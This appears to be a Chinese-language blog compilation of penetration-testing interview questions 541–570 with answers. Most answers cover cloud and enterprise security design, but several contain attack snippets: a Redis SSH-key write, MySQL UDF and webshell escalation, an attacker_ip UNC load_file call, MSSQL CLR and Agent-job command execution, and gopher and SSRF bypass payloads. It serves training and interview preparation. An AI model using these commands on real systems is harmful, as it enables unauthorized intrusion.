2026年渗透测试面试题总结-19(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[541. 传统IDC/云上/混合云安全差异与挑战](#541. 传统IDC/云上/混合云安全差异与挑战)

[542. 云原生安全变化](#542. 云原生安全变化)

[543. 纯云业务安全架构设计](#543. 纯云业务安全架构设计)

[544. SDL关键点与解决方案](#544. SDL关键点与解决方案)

[545. 甲方 vs 乙方漏洞发现差异](#545. 甲方 vs 乙方漏洞发现差异)

[546. 防御0day攻击策略](#546. 防御0day攻击策略)

[547. 企业安全建设阶段侧重](#547. 企业安全建设阶段侧重)

[548. 安全架构设计实践](#548. 安全架构设计实践)

[549. 安全团队协作关系](#549. 安全团队协作关系)

[550. 误报 vs 漏报权衡模型](#550. 误报 vs 漏报权衡模型)

[551. 有限人力下最大化蓝军价值](#551. 有限人力下最大化蓝军价值)

[552. 应用安全审计流程](#552. 应用安全审计流程)

[553. 权限分离与最小化](#553. 权限分离与最小化)

[554. CISP/CISSP核心知识点](#554. CISP/CISSP核心知识点)

[555. 转岗/离职安全流程设计](#555. 转岗/离职安全流程设计)

[556. 绕过CDN找真实IP的5种方法](#556. 绕过CDN找真实IP的5种方法)

[557. Redis未授权利用](#557. Redis未授权利用)

[558. MySQL提权方式](#558. MySQL提权方式)

[559. 无外网权限的SQL注入利用](#559. 无外网权限的SQL注入利用)

[560. 隐蔽信息收集技巧](#560. 隐蔽信息收集技巧)

[561. SRC挖掘 vs 渗透测试](#561. SRC挖掘 vs 渗透测试)

[562. 内网存储XSS利用](#562. 内网存储XSS利用)

[563. MSSQL无xp_cmdshell执行命令](#563. MSSQL无xp_cmdshell执行命令)

[564. WAF绕过分场景策略](#564. WAF绕过分场景策略)

[565. 实战挖洞案例:酒店预订系统](#565. 实战挖洞案例:酒店预订系统)

[566. CSRF防御无Token方案](#566. CSRF防御无Token方案)

[567. SSRF防御纵深设计](#567. SSRF防御纵深设计)

[568. SSRF探测非HTTP协议](#568. SSRF探测非HTTP协议)

[569. SSRF绕过手法](#569. SSRF绕过手法)

[570. DNS重绑定原理与修复](#570. DNS重绑定原理与修复)

复制代码
541	传统IDC、云上、混合云架构的安全差异和各自挑战是什么?
542	云原生技术下的安全变化?
543	纯云业务如何设计安全架构?
544	SDL中的关键点是什么以及如何解决?
545	漏洞发现在甲方和乙方做有什么区别?
546	如何防止0day攻击?
547	对于企业不同时期、不同阶段、不同体量的安全建设的方法、区别以及侧重
548	你所做过的安全架构图和所期望的安全架构
549	安全与其他团队(运维、研发、测试、GR/PR、内控、高管及三方安全公司)的关系
550	误报和漏报如何权衡?
551	如何在有限的人力下最大化突出蓝军价值?
552	如何对一个应用进行安全审计?
553	如何理解权限分离、最小化权限?
554	考察一些CISP、CISSP的知识点
555	挑选一些较为复杂的流程,比如转岗、离职等,如何设计考虑其中的细节
556	如何绕过CDN找到真实IP,请列举五种方法 
557	redis未授权访问如何利用,利用的前提条件是? 
558	mysql提权方式有哪些?利用条件是什么? 
559	windows+mysql,存在sql注入,但是机器无外网权限,可以利用吗? 
560	常用的信息收集手段有哪些,除去路径扫描,子域名爆破等常见手段,有什么猥琐的方法收集企业信息? 
561	SRC挖掘与渗透测试的区别是什么,针对这两个不同的目标,实施过程中会有什么区别 
562	存储xss在纯内网的环境中,可以怎么利用?
563	mssql中,假设为sa权限,如何不通过xp_cmdshell执行系统命令 
564	假设某网站存在waf,不考虑正面绕过的前提下,应该如何绕过(分情况讨论 云waf/物理waf) 
565	介绍一下自认为有趣的挖洞经历(或CTF经历)
566	CSRF的成因及防御措施(不用token如何解决) 
567	SSRF的成因及防御措施 
568	SSRF如何探测非HTTP协议
569	简述一下SSRF的绕过手法
570	简述一下SSRF中DNSRebind的绕过原理及修复方法

541. 传统IDC/云上/混合云安全差异与挑战

复制代码
Mermaid

graph TD A[传统IDC] --> A1[物理边界防护] A --> A2[静态IP策略] A --> A3[挑战:扩容慢/成本高] B[公有云] --> B1[动态资源池] B --> B2[API驱动安全] B --> B3[挑战:配置错误/多租户风险] C[混合云] --> C1[统一策略管理] C --> C2[数据流可视性] C --> C3[挑战:跨云合规/密钥同步]


542. 云原生安全变化

技术变革

  • 容器安全:镜像签名+运行时监控(Falco)
  • 服务网格:mTLS自动加密通信链路
  • 无服务器安全:函数级权限隔离(AWS Lambda IAM)
  • 挑战:临时实例取证困难、K8s RBAC配置错误

543. 纯云业务安全架构设计

分层架构

复制代码
Plaintext

1. 接入层:WAF+API网关(身份认证) 2. 计算层:主机安全Agent+容器沙箱 3. 数据层:TDE加密+动态脱敏 4. 运维层:云原生SIEM(如Azure Sentinel)

关键策略

  • 基础设施即代码(IaC)扫描:Checkov检测Terraform配置风险
  • 零信任网络:基于身份的服务间授权(SPIFFE/SPIRE)

544. SDL关键点与解决方案

阶段 痛点 解决方案
需求阶段 安全需求模糊 威胁建模(STRIDE)量化风险
开发阶段 开发人员安全意识不足 安全组件白盒化(如RSA库封装)
测试阶段 自动化覆盖率低 SAST+DAST+IAST三引擎联动
响应阶段 漏洞修复延迟 热补丁机制(如Red Hat Live Patching)

545. 甲方 vs 乙方漏洞发现差异

维度 甲方 乙方
目标深度 业务逻辑漏洞深耕 通用漏洞快速扫描
工具投入 定制化扫描器(如内部协议) 商业工具(BurpSuite Pro)
修复驱动 直接推动业务线修复 报告驱动客户响应

546. 防御0day攻击策略

分层防控

复制代码
Mermai

graph LR A[网络层] --> A1[IPS签名更新] A --> A2[微分段隔离] B[主机层] --> B1[内存防护(如ASLR)] B --> B2[行为沙箱] C[应用层] --> C1[RASP拦截] C --> C2[WAF虚拟补丁]


547. 企业安全建设阶段侧重

阶段 核心目标 建设重点
初创期 基础防护 边界防火墙+基础身份认证
成长期 合规驱动 ISO27001落地+日志审计
成熟期 主动防御 威胁狩猎+红蓝对抗
生态期 供应链安全 S-SDLC+第三方风险管理

548. 安全架构设计实践

现有架构示例

复制代码
Plaintext

[用户] --> [CDN] --> [WAF] --> [API网关] --> [微服务] --> [DB] │ └── [云SIEM] ← [EDR] + [NIDS]

理想架构

  • 零信任架构:持续设备健康检查
  • 数据安全网格:动态按需解密(如KeyShield)

549. 安全团队协作关系

关键接口

  • 研发:安全组件嵌入CI/CD流水线
  • 运维:安全策略自动化部署(Ansible Tower)
  • GR/PR:安全事件统一话术管理
  • 三方公司:渗透测试结果双向验证

550. 误报 vs 漏报权衡模型

风险系数=漏报危害值×发生概率误报处理成本×频率风险系数=误报处理成本×频率漏报危害值×发生概率

落地实践

  • 高误报场景:机器学习模型二次确认(如Suricata+AI)
  • 高漏报风险:威胁情报驱动检测(如Talos情报订阅)

551. 有限人力下最大化蓝军价值

聚焦策略

  1. 精准打击:每年1次全量渗透 + N次定向攻击(如新业务上线)
  2. 武器化输出:将攻击手法转化为自动化检测规则
  3. 紫军协同:与防御团队共建自动化响应剧本(SOAR)

552. 应用安全审计流程

六步法

复制代码
Plaintext

1. 架构审查:数据流图威胁建模 2. 代码扫描:Semgrep+人工复核 3. 配置核查:K8s RBAC/DB权限矩阵 4. 动态测试:API Fuzz(如Burp Intruder) 5. 权限测试:垂直/水平越权验证 6. 日志溯源:用户行为链重建


553. 权限分离与最小化

实施要点

  • 角色设计:基于RBAC的动态职责分离(如AWS IAM Roles)
  • 权限时效:Just-In-Time访问(如Teleport临时特权)
  • 执行环境:敏感操作在隔离沙箱执行(如AWS Lambda)
  • 审计保障:特权命令录像(如Teleport Session Recording)

554. CISP/CISSP核心知识点

重点域

  • CIA三元组:可用性≠可靠性(如DDoS破坏可用性)
  • 访问控制模型:RBAC vs ABAC vs MAC
  • 加密应用:数字签名(非对称) vs MAC(对称)
  • BCP/DRP:RTO/RPO量化(金融行业RTO<5min)

555. 转岗/离职安全流程设计

关键控制点

复制代码
Mermaid

graph LR A[发起流程] --> B[权限回收预检] B --> C[数据资产交接] C --> D[设备安全擦除] D --> E[离职后审计]

细节

  • 权限回收延迟:设置缓冲期(如3天)并监控异常操作
  • 数据防泄露:DLP扫描离职员工外发行为

556. 绕过CDN找真实IP的5种方法

  1. 历史DNS记录:SecurityTrails查询域名变更
  2. SSL证书匹配:Censys搜索相同证书的IP
  3. 子域名泄露test.example.com可能直连后端
  4. 邮件服务器:从邮件头提取发送IP
  5. 云服务元数据 :AWS实例的user-data可能含内网IP

557. Redis未授权利用

利用条件

  • 未配置密码认证
  • 可远程连接(默认6379开放)

攻击步骤

复制代码
Bash

# 写SSH公钥 redis-cli -h target set key "$(cat ~/.ssh/id_rsa.pub)" config set dir /root/.ssh/ config set dbfilename authorized_keys save


558. MySQL提权方式

方法 条件 命令示例
UDF提权 FILE权限+插件目录写权限 CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so';
日志文件注入 全局FILE权限 SET global general_log_file='/var/www/shell.php';
启动脚本篡改 root权限运行MySQL 注入/etc/init.d/mysql

559. 无外网权限的SQL注入利用

内网渗透手法

  1. SMB中继攻击 :通过MySQL读取攻击载荷(需UNC路径支持)

    复制代码
    Sql

    SELECT load_file('\\attacker_ip\share\shell.php')

  2. 时间盲注代理:利用响应延迟传递数据(需控制多参数)


560. 隐蔽信息收集技巧

  1. 招聘信息挖掘:从JD获取技术栈(如"使用Kong网关")
  2. 供应链溯源 :npm包package.json发现内部域名
  3. 法律文书:裁判文书网搜公司名找技术细节
  4. GitHub代码片段:搜索公司邮箱后缀找员工开源项目

561. SRC挖掘 vs 渗透测试

维度 SRC挖掘 渗透测试
授权范围 全互联网资产(无明确边界) 限定IP/域名范围
目标导向 漏洞数量/严重性 业务风险全覆盖
时间投入 持续性 项目制(2-4周)

562. 内网存储XSS利用

内网特权场景

  1. 管理员劫持:窃取管理Cookie接管后台
  2. 网络探测 :通过XHR扫描内网服务(如http://192.168.1.1:8080
  3. 客户端漏洞:结合IE 0day下载木马

563. MSSQL无xp_cmdshell执行命令

替代方案

复制代码
Sql

-- 通过CLR程序集 CREATE ASSEMBLY ExecShell FROM 'c:\shell.dll' CREATE PROCEDURE sp_exec AS EXTERNAL NAME ExecShell.StoredProcedures.Cmd EXEC sp_exec 'whoami' -- 利用Agent作业(需sysadmin) EXEC msdb.dbo.sp_add_job @job_name='evil' EXEC msdb.dbo.sp_add_jobstep @job_name='evil', @command='cmd /c calc' EXEC msdb.dbo.sp_start_job 'evil'


564. WAF绕过分场景策略

云WAF绕过

  • IP轮询:寻找未防护的CDN边缘节点
  • 协议兼容性:HTTP/2走私请求
  • 地域探测:通过海外IP访问可能无WAF

硬件WAF绕过

  • TCP策略:慢速攻击耗尽会话表
  • 规则集差异:测试WAF品牌已知误报(如Imperva CVE-2020-XXXX)

565. 实战挖洞案例:酒店预订系统

漏洞链

复制代码
Mermaid

graph LR A[IDOR泄露订单] --> B[预订信息修改] B --> C[积分盗刷] C --> D[支付回调篡改]

关键点

  • 发现预订ID为自增整数,遍历他人订单
  • 修改回调URL参数实现0元支付
  • 组合漏洞获$5000 SRC奖金

566. CSRF防御无Token方案

替代方案

  1. 同源检测 :校验Origin头(需现代浏览器)
  2. 双重Cookie :前端读Cookie写入自定义头(如X-CSRF-TOKEN
  3. 行为验证:敏感操作需密码二次确认

567. SSRF防御纵深设计

分层防护

复制代码
Plaintext

1. 输入校验:禁用非标准URL Scheme(如file://) 2. 网络隔离:出口流量强制代理(仅允许HTTP/HTTPS) 3. 响应过滤:拦截非常规响应(如302跳转私有IP) 4. 权限控制:应用程序使用独立出网身份


568. SSRF探测非HTTP协议

探测手法

  • DNS回连dict://<ip>:53/resolve?name=evil.com
  • gopher弹Shell :构造Redis协议gopher://:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
  • FTP被动模式:触发FTP服务返回端口开放信息

569. SSRF绕过手法

经典绕过

  1. IPv6兼容http://[::1]:80
  2. 域名重解析xip.io127.0.0.1.xip.io
  3. URL畸形http://127.0.0.1%0d%0a.example.com
  4. DNS重绑定:TTL=0时快速切换IP

570. DNS重绑定原理与修复

原理

复制代码
Mermaid

sequenceDiagram 用户->>恶意网站: 访问 evil.com 恶意网站->>DNS: 响应真实IP(首次) DNS->>用户: 返回IP1 用户->>IP1: 发起SSRF请求 恶意网站->>DNS: 切换为127.0.0.1(TTL=0) 用户->>127.0.0.1: 请求被重绑定

修复

  • 应用层DNS缓存:解析域名后缓存IP至会话结束
  • 网络层管控:禁止容器环境发起点A记录查询
相关推荐
_Johnny_3 小时前
ETCD 配额/空间告警模拟方案
网络·数据库·etcd
CHENKONG_CK3 小时前
晨控CK-LR08-E00与汇川H5U系列PLC配置MODBUSTCP通讯连接手册
linux·服务器·网络
天荒地老笑话么3 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
Tadas-Gao3 小时前
TCP粘包现象的深度解析:从协议本质到工程实践
网络·网络协议·云原生·架构·tcp
IOsetting4 小时前
金山云主机添加开机路由
运维·服务器·开发语言·网络·php
kali-Myon4 小时前
2025春秋杯网络安全联赛冬季赛-day1
java·sql·安全·web安全·ai·php·web
wwwlyj1233214 小时前
对称加密和非对称加密
安全
kali-Myon4 小时前
2025春秋杯网络安全联赛冬季赛-day3
python·安全·web安全·ai·php·web·ctf
XiaoMu_0014 小时前
自动化漏洞扫描与预警平台
运维·网络·自动化